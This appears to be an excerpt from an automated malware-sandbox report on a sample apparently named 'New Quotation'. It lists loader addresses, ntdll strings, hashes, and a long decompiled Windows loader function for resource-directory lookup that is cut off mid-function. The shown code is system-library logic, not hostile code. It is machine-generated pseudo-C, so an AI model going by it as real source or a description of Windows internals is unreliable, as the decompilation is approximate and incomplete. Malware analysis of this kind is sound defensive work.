                                                                                                                                                                                          0x1d804c42
                                                                                                                                                                                          0x1d804c47
                                                                                                                                                                                          0x1d804c4a
                                                                                                                                                                                          0x1d804c4c
                                                                                                                                                                                          0x1d804c52
                                                                                                                                                                                          0x1d804cb8
                                                                                                                                                                                          0x1d804cbe
                                                                                                                                                                                          0x1d804cbe
                                                                                                                                                                                          0x1d804c5a
                                                                                                                                                                                          0x1d804c5d
                                                                                                                                                                                          0x1d804c69
                                                                                                                                                                                          0x1d804c6f
                                                                                                                                                                                          0x1d804c74
                                                                                                                                                                                          0x1d804cd6
                                                                                                                                                                                          0x1d804cda
                                                                                                                                                                                          0x1d8433b9
                                                                                                                                                                                          0x1d8433be
                                                                                                                                                                                          0x1d8433f7
                                                                                                                                                                                          0x1d8433f7
                                                                                                                                                                                          0x1d8433be
                                                                                                                                                                                          0x1d804cda
                                                                                                                                                                                          0x1d804c76
                                                                                                                                                                                          0x1d804c84
                                                                                                                                                                                          0x1d804c8c
                                                                                                                                                                                          0x1d804c90
                                                                                                                                                                                          0x1d804ca9
                                                                                                                                                                                          0x1d804ca9
                                                                                                                                                                                          0x1d804cae
                                                                                                                                                                                          0x1d804ce4
                                                                                                                                                                                          0x1d804cee
                                                                                                                                                                                          0x1d804cf3
                                                                                                                                                                                          0x1d804cf3
                                                                                                                                                                                          0x1d804ce6
                                                                                                                                                                                          0x1d804ce6
                                                                                                                                                                                          0x1d804cb2
                                                                                                                                                                                          0x1d843463
                                                                                                                                                                                          0x1d84347b
                                                                                                                                                                                          0x1d843480
                                                                                                                                                                                          0x1d84348a
                                                                                                                                                                                          0x1d843490
                                                                                                                                                                                          0x1d843490
                                                                                                                                                                                          0x1d84348a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804cb2
                                                                                                                                                                                          0x1d804c98
                                                                                                                                                                                          0x1d804cc5
                                                                                                                                                                                          0x1d843429
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84342f
                                                                                                                                                                                          0x1d804cc5
                                                                                                                                                                                          0x1d804ca1
                                                                                                                                                                                          0x1d843434
                                                                                                                                                                                          0x1d843435
                                                                                                                                                                                          0x1d84344f
                                                                                                                                                                                          0x1d843454
                                                                                                                                                                                          0x1d843454
                                                                                                                                                                                          0x1d804ca7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 1D84344A, 1D843476
                                                                                                                                                                                          • LdrpFindDllActivationContext, xrefs: 1D843440, 1D84346C
                                                                                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1D843439
                                                                                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 1D843466
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                          • API String ID: 3446177414-3779518884
                                                                                                                                                                                          • Opcode ID: aedda66c305fa6dc367a709d4b63b1c9e949bb566a1cf70e6cd78fa12346aa52
                                                                                                                                                                                          • Instruction ID: c22e42f4773ffcf0cd65b58363e3d6574462fbd4885be2a5bfed54ea71d3a84e
                                                                                                                                                                                          • Opcode Fuzzy Hash: aedda66c305fa6dc367a709d4b63b1c9e949bb566a1cf70e6cd78fa12346aa52
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6131C472EC0696FFDB129B0C8C89BB9B3A4BB45768F16C12AF90457151D770AD80C2D3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7DE9A0 Relevance: 8.6, Strings: 6, Instructions: 1073COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                          			E1D7DE9A0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, intOrPtr _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44) {
				signed int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v552;
				signed short _v554;
				signed short _v556;
				signed int _v560;
				signed int _v564;
				char _v568;
				char _v584;
				signed int _v588;
				signed int _v592;
				char _v593;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				char _v625;
				signed int _v632;
				signed int _v636;
				signed short _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				intOrPtr _v692;
				signed int _v696;
				short _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed short _v720;
				signed int _v724;
				intOrPtr _v728;
				signed short _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				signed int _v764;
				char* _v772;
				char _v776;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t493;
				signed int _t494;
				signed int* _t503;
				signed char* _t504;
				signed int _t505;
				signed char* _t506;
				signed int _t511;
				char _t515;
				short* _t518;
				void* _t522;
				signed int _t523;
				signed int _t528;
				signed char* _t529;
				signed int _t530;
				signed char* _t531;
				signed int _t539;
				signed int _t541;
				void* _t544;
				signed int _t545;
				signed int _t546;
				signed int _t551;
				void* _t552;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t561;
				signed int _t563;
				signed int _t565;
				signed int _t566;
				signed int _t568;
				signed int _t570;
				signed int _t572;
				intOrPtr _t576;
				char _t580;
				signed int _t581;
				intOrPtr _t591;
				signed int _t593;
				signed short _t595;
				signed int _t598;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int _t607;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t620;
				signed int _t621;
				signed int _t624;
				signed int _t629;
				signed int _t630;
				signed int _t635;
				signed int _t638;
				signed int _t640;
				signed char _t649;
				signed int _t656;
				void* _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t670;
				signed int _t671;
				signed int _t673;
				signed int _t679;
				signed int _t681;
				intOrPtr _t684;
				signed int _t687;
				signed int _t691;
				signed int _t692;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t709;
				signed int _t711;
				signed int _t712;
				signed int _t713;
				signed int _t716;
				signed int _t719;
				signed int _t723;
				signed int _t724;
				signed int _t727;
				signed int _t729;
				intOrPtr* _t730;
				signed int _t740;
				signed int _t751;
				intOrPtr _t757;
				signed int _t758;
				intOrPtr _t760;
				void* _t761;
				signed int _t763;
				intOrPtr _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t771;
				signed int _t774;
				void* _t775;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				void* _t785;
				intOrPtr _t786;
				signed int _t793;
				signed int _t816;
				void* _t824;

				_push(0xfffffffe);
				_push(0x1d8ac0e8);
				_push(E1D81AD20);
				_push( *[fs:0x0]);
				_t786 = _t785 - 0x2f4;
				_t493 =  *0x1d8cb370;
				_v12 = _v12 ^ _t493;
				_t494 = _t493 ^ _t784;
				_v32 = _t494;
				_push(_t494);
				 *[fs:0x0] =  &_v20;
				_v28 = _t786;
				_v668 = __edx;
				_t656 = __ecx;
				_v672 = __ecx;
				_t673 = _a4;
				_v608 = _t673;
				_t774 = _a8;
				_v604 = _t774;
				_t760 = _a12;
				_v728 = _t760;
				_v724 = _a16;
				_t749 = _a20;
				_v688 = _t749;
				_v740 = _a28;
				_v696 = _a32;
				_v764 = _a36;
				_v704 = _a44;
				_v568 = 0;
				_v564 = 0;
				_v560 = 0;
				_v556 = 0;
				_v700 = 0;
				_v632 = 0;
				_v592 = 0;
				_v640 = 0;
				_v712 = 0x560054;
				_v708 = L"LdrpResSearchResourceInsideDirectory Enter";
				_v776 = 0x540052;
				_v772 = L"LdrpResSearchResourceInsideDirectory Exit";
				_t503 =  *( *[fs:0x30] + 0x50);
				if(_t503 != 0) {
					__eflags =  *_t503;
					if( *_t503 == 0) {
						goto L1;
					}
					_t504 =  *( *[fs:0x30] + 0x50) + 0x22b;
					L2:
					if(( *_t504 & 0x00000001) != 0) {
						_t505 = E1D7E3C40();
						__eflags = _t505;
						if(_t505 == 0) {
							_t506 = 0x7ffe0384;
						} else {
							_t506 =  *( *[fs:0x30] + 0x50) + 0x22a;
						}
						E1D85FC01( &_v712,  *_t506 & 0x000000ff);
						_t673 = _v608;
						_t749 = _v688;
					}
					if(_t774 == 0 || _t760 == 0 || _t749 == 0) {
						L220:
						_t508 = 0xc000000d;
						goto L120;
					} else {
						_t511 = _a24 - 1;
						if(_t511 > 3) {
							goto L220;
						}
						_t749 = _a40;
						_v636 = _t749;
						_t793 = _t749 & 0x00008000;
						if(_t793 != 0) {
							_t511 = _v668;
							__eflags = _t511;
							if(_t511 == 0) {
								goto L220;
							}
							__eflags = _t511 - 0xffffffff;
							if(_t511 == 0xffffffff) {
								goto L220;
							}
							__eflags = _v724;
							if(_v724 != 0) {
								goto L8;
							}
							goto L220;
						}
						L8:
						_t763 = _t749 & 0x00001000;
						_v620 = _t763;
						_v676 = _t511 & 0xffffff00 | _t793 != 0x00000000;
						if((_t749 & 0x00008800) == 0x8800) {
							_t515 = 1;
						} else {
							_t515 = 0;
						}
						_v593 = _t515;
						if(_t763 == 0 || _t673 != 0) {
							if(_t515 != 0 || _t656 != 0) {
								if(_t515 == 1) {
									__eflags = _v668;
									if(_v668 == 0) {
										goto L220;
									}
								}
								_v748 = _v688;
								_v692 = _a24;
								_t679 = 0;
								_v616 = 0;
								_v624 = 0;
								_v684 = 0;
								_t518 = _v704;
								if(_t518 != 0) {
									 *_t518 = 0;
									_t763 = _v620;
								}
								_v8 = _t679;
								_v720 = _v640;
								_v612 = _v660;
								L18:
								while(_t774 != 0) {
									_t576 = _v692;
									_t757 = _t576 - 1;
									_v692 = _t757;
									_v760 = _t757;
									_t749 = _v636;
									if(_t576 == 0) {
										break;
									}
									_v632 =  *_v688;
									if(_v692 == 0) {
										L127:
										__eflags = _a24 - 3;
										if(_a24 != 3) {
											goto L21;
										}
										_v684 = _t774;
										_t712 = _v740;
										__eflags = _t712;
										if(_t712 == 0) {
											_v588 = 0xc000000d;
											L114:
											_t658 = _v592;
											L115:
											__eflags = _t658;
											if(_t658 != 0) {
												E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t658);
												_v592 = 0;
											}
											_t528 =  *( *[fs:0x30] + 0x50);
											__eflags = _t528;
											if(_t528 != 0) {
												__eflags =  *_t528;
												if( *_t528 == 0) {
													goto L117;
												}
												_t529 =  *( *[fs:0x30] + 0x50) + 0x22b;
												goto L118;
											} else {
												L117:
												_t529 = 0x7ffe0385;
												L118:
												__eflags =  *_t529 & 0x00000001;
												if(( *_t529 & 0x00000001) != 0) {
													_t530 = E1D7E3C40();
													__eflags = _t530;
													if(_t530 == 0) {
														_t531 = 0x7ffe0384;
													} else {
														_t531 =  *( *[fs:0x30] + 0x50) + 0x22a;
													}
													_t749 =  *_t531 & 0x000000ff;
													E1D85FC01( &_v776,  *_t531 & 0x000000ff);
												}
												_v8 = 0xfffffffe;
												_t508 = _v588;
												L120:
												 *[fs:0x0] = _v20;
												_pop(_t761);
												_pop(_t775);
												_pop(_t657);
												__eflags = _v32 ^ _t784;
												return E1D814B50(_t508, _t657, _v32 ^ _t784, _t749, _t761, _t775);
											}
										}
										_v700 =  *_t712;
										_v720 = 0;
										_v640 = 0;
										_t649 =  !_t749;
										__eflags = _t649 & 0x00000004;
										if((_t649 & 0x00000004) != 0) {
											_v632 =  *(_t712 + 4) & 0x0000ffff;
										}
									}
									L21:
									_t749 = _v593;
									if(_t749 != 0) {
										_t749 = _t774;
										_t508 = E1D863592(_v668,  &_v568, 0x10);
										_v588 = _t508;
										__eflags = _t508;
										if(_t508 < 0) {
											L273:
											_v8 = 0xfffffffe;
											goto L120;
										}
										_t749 = _v593;
										__eflags = _t749;
										if(_t749 == 0) {
											goto L22;
										}
										L227:
										_t709 = _v556 & 0x0000ffff;
										L27:
										_v648 = _t709;
										_v680 = _t709;
										if(_t709 != 0) {
											__eflags = _t763;
											if(_t763 == 0) {
												goto L28;
											}
											_t749 = _t709 * 8 >> 0x20;
											_t638 = E1D804CF8( &_v736, _t709 * 8, _t709 * 8 >> 0x20);
											__eflags = _t638;
											if(_t638 < 0) {
												_v588 = 0xc000007b;
												goto L114;
											}
											_t771 = _v736;
											_t749 = _t771 + 0x10;
											_t640 = E1D7C94A3(_t774, _t771 + 0x10,  &_v600);
											__eflags = _t640;
											if(_t640 < 0) {
												_v588 = 0xc000007b;
												goto L114;
											}
											__eflags = _t771 + 0x10 + _t774 - (_t656 & 0xfffffffc) + _v608;
											if(_t771 + 0x10 + _t774 > (_t656 & 0xfffffffc) + _v608) {
												_v588 = 0xc000007b;
												goto L114;
											}
											_t709 = _v648;
											_t763 = _v620;
										}
										L28:
										_t79 = _t774 + 0x10; // 0x10
										_t749 = _t79;
										_v664 = _t749;
										_v716 = _t749;
										if((_v632 & 0xffff0000) != 0) {
											L39:
											_t580 = _v593;
											L40:
											if(_t709 == 0) {
												_v652 = 0;
												L139:
												_t522 = _a24 - _v692;
												__eflags = _t522 - 1;
												if(_t522 != 1) {
													_t523 = _t522 - 2;
													__eflags = _t523;
													if(_t523 != 0) {
														__eflags = _t523 == 1;
														if(_t523 == 1) {
															_v588 = 0xc0000204;
														} else {
															_v588 = 0xc000000d;
														}
													} else {
														_v588 = 0xc000008b;
													}
												} else {
													_v588 = 0xc000008a;
												}
												goto L114;
											}
											if(_t580 != 0) {
												_t581 = _v592;
												__eflags = _t581;
												if(_t581 != 0) {
													E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t581);
													_v592 = 0;
													_t709 = _v680;
												}
												_t781 = _t709 * 8;
												_t658 = E1D7E5D90(_t709,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t709 * 8);
												_v592 = _t658;
												__eflags = _t658;
												if(_t658 != 0) {
													_t749 = _v716;
													_t508 = E1D863592(_v668, _t658, _t781);
													_v588 = _t508;
													__eflags = _t508;
													if(_t508 < 0) {
														goto L273;
													}
													_t749 = _t658;
													_v664 = _t749;
													_v716 = _t749;
													_v636 = _a40;
													_v720 = _v640;
													_v688 = _v748;
													_v692 = _v760;
													_v616 = _v624;
													_t709 = _v680;
													_v648 = _t709;
													_v612 = _v660;
													L43:
													while(1) {
														L43:
														if(_v684 != 0) {
															__eflags = _v636 & 0x00000020;
															if((_v636 & 0x00000020) == 0) {
																while(1) {
																	L45:
																	_t774 = 0;
																	_v652 = 0;
																	_t769 = _t749;
																	_v716 = _t769;
																	_t591 = _t749 + (_t709 - 1) * 8;
																	_v756 = _t591;
																	while(1) {
																		L46:
																		_v680 = _t709;
																		while(1) {
																			L47:
																			_t824 = _t769 - _t591;
																			if(_t824 > 0) {
																				break;
																			}
																			_t670 = _t709 >> 1;
																			if(_t824 != 0) {
																				_t716 = _t709 & 0x00000001;
																				__eflags = _t716;
																				_v708 = _t716;
																				_t603 = _t769 + _t670 * 8;
																				_v644 = _t603;
																				if(_t716 == 0) {
																					_t603 = _t603 + 0xfffffff8;
																					__eflags = _t603;
																					_v644 = _t603;
																				}
																				_t749 = _v668;
																				_t508 = E1D7DF708(_v672, _v668, _v608, _v632, _v604, _t603, _v636,  &_v660);
																				_v588 = _t508;
																				__eflags = _t508;
																				if(_t508 < 0) {
																					goto L273;
																				} else {
																					_t604 = _v660;
																					_v612 = _t604;
																					__eflags = _t604;
																					if(__eflags != 0) {
																						if(__eflags < 0) {
																							_t591 = _v644 + 0xfffffff8;
																							_v756 = _t591;
																							__eflags = _v708;
																							if(_v708 == 0) {
																								_t709 = _t670 - 1;
																								L46:
																								_v680 = _t709;
																								continue;
																							}
																							_v680 = _t670;
																							_t709 = _t670;
																							continue;
																						}
																						_t769 = _v644 + 8;
																						_v716 = _t769;
																						_v680 = _t670;
																						_t591 = _v756;
																						_t709 = _t670;
																						continue;
																					}
																					_t607 =  *(_v644 + 4);
																					__eflags = _t607;
																					if(_t607 < 0) {
																						L63:
																						if(_v620 == _t774) {
																							_t774 = (_t607 & 0x7fffffff) + _v604;
																							_v652 = _t774;
																							break;
																						}
																						if(_v684 != _t774) {
																							_v588 = 0xc000007b;
																							goto L114;
																						}
																						_t719 = _v604;
																						_t774 = _t719 + (_t607 & 0x7fffffff);
																						if(_t774 < _t719) {
																							L230:
																							_v600 = 0xffffffff;
																							_v588 = 0xc000007b;
																							goto L114;
																						}
																						_v600 = _t774;
																						_v652 = _t774;
																						break;
																					}
																					_t774 = 0;
																					_v652 = 0;
																					__eflags = _v620;
																					if(_v620 == 0) {
																						L253:
																						_t609 = _t607 + _v604;
																						goto L252;
																					} else {
																						__eflags = _v684;
																						if(_v684 != 0) {
																							_t749 = _t607;
																							_t610 = E1D7C94A3(_v604, _t607,  &_v600);
																							__eflags = _t610;
																							if(_t610 >= 0) {
																								_t609 = _v600;
																								L252:
																								_v616 = _t609;
																								L137:
																								_v624 = _t609;
																								break;
																							}
																							_v588 = 0xc000007b;
																							goto L114;
																						}
																						_v588 = 0xc000007b;
																						goto L114;
																					}
																					goto L127;
																				}
																			}
																			if(_t709 == 0) {
																				break;
																			}
																			_t611 = _v636;
																			_t723 = _t611 & 0x00001000;
																			if((_t611 & 0x00008800) == 0x8800) {
																				_v625 = 1;
																			} else {
																				_v625 = 0;
																			}
																			if(_t769 == 0) {
																				_t508 = 0xc000000d;
																				_v588 = 0xc000000d;
																				goto L273;
																			} else {
																				_t671 = 0;
																				_v656 = 0;
																				_t613 =  *_t769;
																				_t749 = _v632;
																				if((_t749 & 0xffff0000) != 0) {
																					__eflags = _t613;
																					if(_t613 >= 0) {
																						_t724 = _t723 | 0xffffffff;
																						L58:
																						_v660 = _t724;
																						_v612 = _t724;
																						L59:
																						_t508 = _t671;
																						_v588 = _t671;
																						L60:
																						if(_t671 < 0) {
																							goto L273;
																						}
																						if(_t724 != 0) {
																							break;
																						}
																						_t607 =  *(_t769 + 4);
																						if(_t607 >= 0) {
																							L133:
																							__eflags = _v620 - _t774;
																							if(_v620 == _t774) {
																								goto L253;
																							}
																							__eflags = _v684 - _t774;
																							if(_v684 == _t774) {
																								L229:
																								_v588 = 0xc000007b;
																								goto L114;
																							}
																							_t609 = _t607 + _v604;
																							_v616 = _t609;
																							__eflags = _t609 - _v604;
																							if(_t609 < _v604) {
																								goto L230;
																							}
																							_v600 = _t609;
																							goto L137;
																						}
																						goto L63;
																					}
																					_t614 = _t613 & 0x7fffffff;
																					_v708 = _t614;
																					__eflags = _t723;
																					if(_t723 == 0) {
																						_t615 = _t614 + _v604;
																						_v744 = _t615;
																						L186:
																						_v644 = _t615;
																						__eflags = _v625 - _t671;
																						if(_v625 != _t671) {
																							_t749 = _t615;
																							_t508 = E1D863592(_v668,  &_v732, 2);
																							_t671 = _t508;
																							_v656 = _t671;
																							__eflags = _t671;
																							if(_t671 >= 0) {
																								_t727 = _v732 & 0x0000ffff;
																								__eflags = _t727 + 3 - 0x104;
																								if(_t727 + 3 <= 0x104) {
																									_t749 = _v644;
																									_t508 = E1D863592(_v668,  &_v552, 2 + _t727 * 2);
																									_t671 = _t508;
																									_v656 = _t671;
																									__eflags = _t671;
																									if(_t671 >= 0) {
																										_t615 =  &_v552;
																										_v644 = _t615;
																										_t749 = _v632;
																										goto L187;
																									}
																									_v588 = _t508;
																									_t724 = _v612;
																									goto L60;
																								}
																								_t671 = 0xc000007b;
																								_v656 = 0xc000007b;
																								_t724 = _v612;
																								goto L59;
																							}
																							_v588 = _t508;
																							_t724 = _v612;
																							goto L60;
																						}
																						L187:
																						_t729 = _t615 + 2;
																						__eflags = _t729 & 0xffff0000;
																						if((_t729 & 0xffff0000) == 0) {
																							_t671 = 0xc000007b;
																							_v656 = 0xc000007b;
																							_t724 = _v612;
																							goto L59;
																						}
																						_t620 = E1D81A7F0(_t749, _t729,  *_t615 & 0x0000ffff);
																						_t786 = _t786 + 0xc;
																						_t724 = _t620;
																						_v612 = _t724;
																						__eflags = _t724;
																						if(_t724 != 0) {
																							L193:
																							_v660 = _t724;
																							goto L59;
																						}
																						_t730 = _v632;
																						_t337 = _t730 + 2; // 0xffff0002
																						_t749 = _t337;
																						do {
																							_t621 =  *_t730;
																							_t730 = _t730 + 2;
																							__eflags = _t621;
																						} while (_t621 != 0);
																						__eflags = _t730 - _t749 >> 1 - ( *_v644 & 0x0000ffff);
																						if(_t730 - _t749 >> 1 != ( *_v644 & 0x0000ffff)) {
																							L267:
																							_t724 = 1;
																							goto L58;
																						}
																						_t724 = _v612;
																						goto L193;
																					}
																					_t749 = _t614;
																					_t624 = E1D7C94A3(_v604, _t614,  &_v744);
																					__eflags = _t624;
																					if(_t624 < 0) {
																						_t671 = 0xc000007b;
																						_v656 = 0xc000007b;
																						_t724 = _v612;
																						goto L59;
																					}
																					__eflags = _v708 + _v604 - (_v672 & 0xfffffffc) + _v608;
																					if(_v708 + _v604 > (_v672 & 0xfffffffc) + _v608) {
																						_t671 = 0xc000007b;
																						_v656 = 0xc000007b;
																						_t724 = _v612;
																						goto L59;
																					}
																					_t615 = _v744;
																					_t749 = _v632;
																					goto L186;
																				}
																				if(_t613 < 0) {
																					__eflags = _t723;
																					if(_t723 == 0) {
																						goto L267;
																					}
																					__eflags = _t613 & 0xffff0000;
																					if((_t613 & 0xffff0000) != 0) {
																						goto L267;
																					}
																					_t671 = 0xc000007b;
																					_v656 = 0xc000007b;
																					_t724 = _v612;
																					goto L59;
																				}
																				if(_t723 == 0 || (_t613 & 0xffff0000) == 0) {
																					_t724 = _t749 - _t613;
																					goto L58;
																				} else {
																					_t671 = 0xc000007b;
																					_v656 = 0xc000007b;
																					_t724 = _v612;
																					goto L59;
																				}
																			}
																		}
																		_t749 = _v636;
																		if(_v684 != 0) {
																			_t679 = _v616;
																			__eflags = _t679;
																			if(_t679 != 0) {
																				goto L68;
																			}
																			__eflags = _t749 & 0x00000004;
																			if((_t749 & 0x00000004) != 0) {
																				_t763 = _v620;
																				L77:
																				_t656 = _v672;
																				goto L78;
																			}
																			_t595 = _v720 + 1;
																			_v720 = _t595;
																			_v640 = _t595;
																			_t713 = _t595 & 0x0000ffff;
																			__eflags = _t713 - _v700;
																			_t598 = _v740;
																			if(_t713 >= _v700) {
																				__eflags =  *((char*)(_t598 + 0x204));
																				if( *((char*)(_t598 + 0x204)) != 0) {
																					goto L68;
																				}
																				_t758 = _t749 | 0x00000020;
																				_v636 = _t758;
																				_a40 = _t758;
																				_t709 = _v648;
																				_t763 = _v620;
																				_t749 = _v664;
																				goto L43;
																			}
																			_v632 =  *(_t598 + 4 + _t713 * 8) & 0x0000ffff;
																			_t709 = _v648;
																			_t749 = _v664;
																			L45:
																			_t774 = 0;
																			_v652 = 0;
																			_t769 = _t749;
																			_v716 = _t769;
																			_t591 = _t749 + (_t709 - 1) * 8;
																			_v756 = _t591;
																			continue;
																		}
																		L68:
																		_t593 = _v688 + 4;
																		_v688 = _t593;
																		_v748 = _t593;
																		_t656 = _v672;
																		_t763 = _v620;
																		_t679 = _v616;
																		goto L18;
																	}
																}
															}
															_t774 = 0;
															_v652 = 0;
															__eflags = _t763;
															if(_t763 == 0) {
																_t679 =  *((intOrPtr*)(_t749 + 4)) + _v604;
																_v624 = _t679;
																goto L76;
															} else {
																_t601 = E1D7C94A3(_v604, _t749,  &_v600);
																__eflags = _t601;
																if(_t601 < 0) {
																	_v588 = 0xc000007b;
																	goto L114;
																}
																_t679 = _v600;
																_v624 = _t679;
																_t749 = _v664;
																L76:
																_v616 = _t679;
																_v632 =  *_t749;
																_t749 = _v636;
																goto L77;
															}
															goto L133;
														}
														goto L45;
													}
												} else {
													_v588 = 0xc0000017;
													goto L115;
												}
											}
											goto L43;
										}
										if(_t709 != 0) {
											__eflags = _t763;
											if(_t763 == 0) {
												L151:
												_t749 = _t749 + _t709 * 8;
												_v664 = _t749;
												_v716 = _t749;
												goto L30;
											}
											_t749 = _t709;
											_t635 = E1D7C94A3(_v664, _t709,  &_v600);
											__eflags = _t635;
											if(_t635 < 0) {
												_v588 = 0xc000007b;
												goto L114;
											}
											_t709 = _v648;
											_t749 = _v664;
											goto L151;
										}
										L30:
										_t580 = _v593;
										if(_t580 != 0) {
											_t709 = _v554 & 0x0000ffff;
										} else {
											_t709 =  *(_t774 + 0xe) & 0x0000ffff;
										}
										_v648 = _t709;
										_v680 = _t709;
										if(_t763 == 0) {
											goto L40;
										} else {
											_t629 = _t709;
											_t749 = _t629 * 8 >> 0x20;
											_t630 = _t629 * 8;
											_v712 = _t630;
											_v708 = _t749;
											_t816 = _t749;
											if(_t816 < 0 || _t816 <= 0 && _t630 <= 0xffffffff) {
												_v736 = _t630;
												_t749 = _v664;
												_t740 = _t630 + _t749;
												if(_t740 < _t749) {
													goto L230;
												}
												_v600 = _t740;
												if(_t740 > (_t656 & 0xfffffffc) + _v608) {
													_v588 = 0xc000007b;
													goto L114;
												}
												_t709 = _v648;
												goto L39;
											} else {
												_v736 = 0xffffffff;
												_v588 = 0xc000007b;
												goto L114;
											}
										}
									}
									L22:
									if(_t763 == 0) {
										L25:
										if(_t749 != 0) {
											goto L227;
										}
										_t709 =  *(_t774 + 0xc) & 0x0000ffff;
										goto L27;
									}
									_t73 = _t774 + 0x18; // 0x18
									_t711 = _t73;
									if(_t711 < _t774) {
										goto L230;
									}
									_v600 = _t711;
									if(_t711 > (_t656 & 0xfffffffc) + _v608) {
										goto L229;
									}
									goto L25;
								}
								L78:
								_t749 = _t749 & 0x00000002;
								__eflags = _t679;
								if(_t679 == 0) {
									L138:
									__eflags = _t774;
									if(_t774 != 0) {
										__eflags = _t749;
										if(_t749 == 0) {
											goto L139;
										}
										__eflags = _t763;
										if(_t763 == 0) {
											_t659 = _t656 & 0xfffffffc;
											_t749 = _v608;
											L198:
											_t681 = _v696;
											__eflags = _t681;
											if(_t681 == 0) {
												L203:
												_v588 = 0;
												goto L114;
											}
											__eflags = _t763;
											if(_t763 == 0) {
												L202:
												 *_t681 = _t774;
												goto L203;
											}
											__eflags = _t774 - _t659;
											if(_t774 < _t659) {
												goto L229;
											}
											__eflags = _t774 - _t659 + _t749;
											if(_t774 > _t659 + _t749) {
												goto L229;
											}
											goto L202;
										}
										_t749 = 0x18;
										_t539 = E1D7C94A3(_t774, 0x18,  &_v600);
										__eflags = _t539;
										if(_t539 < 0) {
											_v652 = 0;
											goto L229;
										}
										_t659 = _t656 & 0xfffffffc;
										_t749 = _v608;
										_t344 = _t774 + 0x18; // 0x18
										__eflags = _t344 - _t749 + _t659;
										if(_t344 > _t749 + _t659) {
											_v652 = 0;
											goto L229;
										}
										goto L198;
									}
									goto L139;
								}
								__eflags = _t749;
								if(_t749 != 0) {
									goto L138;
								}
								__eflags = _t763;
								if(_t763 == 0) {
									L84:
									_t751 = _v704;
									__eflags = _t751;
									if(_t751 != 0) {
										 *_t751 = _v632;
									}
									_t777 = _t656 & 0xfffffffc;
									__eflags = _t656 & 0x00000001;
									if((_t656 & 0x00000001) != 0) {
										L152:
										_t684 = _v728;
										_t541 =  *(_t684 + 0x18) & 0x0000ffff;
										_t749 = 0x10b;
										__eflags = _t541 - 0x10b;
										if(_t541 != 0x10b) {
											_t749 = 0x20b;
											__eflags = _t541 - 0x20b;
											if(_t541 != 0x20b) {
												L288:
												_v624 = 0;
												_v588 = 0xc0000089;
												goto L114;
											}
											_t660 =  *(_t684 + 0x98);
											L154:
											__eflags = _t660;
											if(_t660 == 0) {
												goto L288;
											}
											__eflags = _t763;
											if(_t763 == 0) {
												L159:
												_t766 = _t660 - _v604 + _t777;
												_v752 = _t766;
												_t749 = _v608;
												_t661 = E1D7D81C2(_t777, _v608, _t684, _v724, _t660, _v676);
												__eflags = _t661;
												if(_t661 == 0) {
													_v624 = 0;
													goto L229;
												}
												__eflags = _v593;
												if(_v593 != 0) {
													_t749 = _v616;
													_t508 = E1D863592(_v668,  &_v584, 0x10);
													_v588 = _t508;
													__eflags = _t508;
													if(_t508 < 0) {
														goto L273;
													}
													_t687 =  &_v584;
													_v616 = _t687;
													_v624 = _t687;
													L162:
													_t544 =  *_t687;
													__eflags = _t544 -  *((intOrPtr*)(_t661 + 8));
													if(_t544 >  *((intOrPtr*)(_t661 + 8))) {
														_v704 =  *((intOrPtr*)(_t661 + 0xc));
														_t749 = _v608;
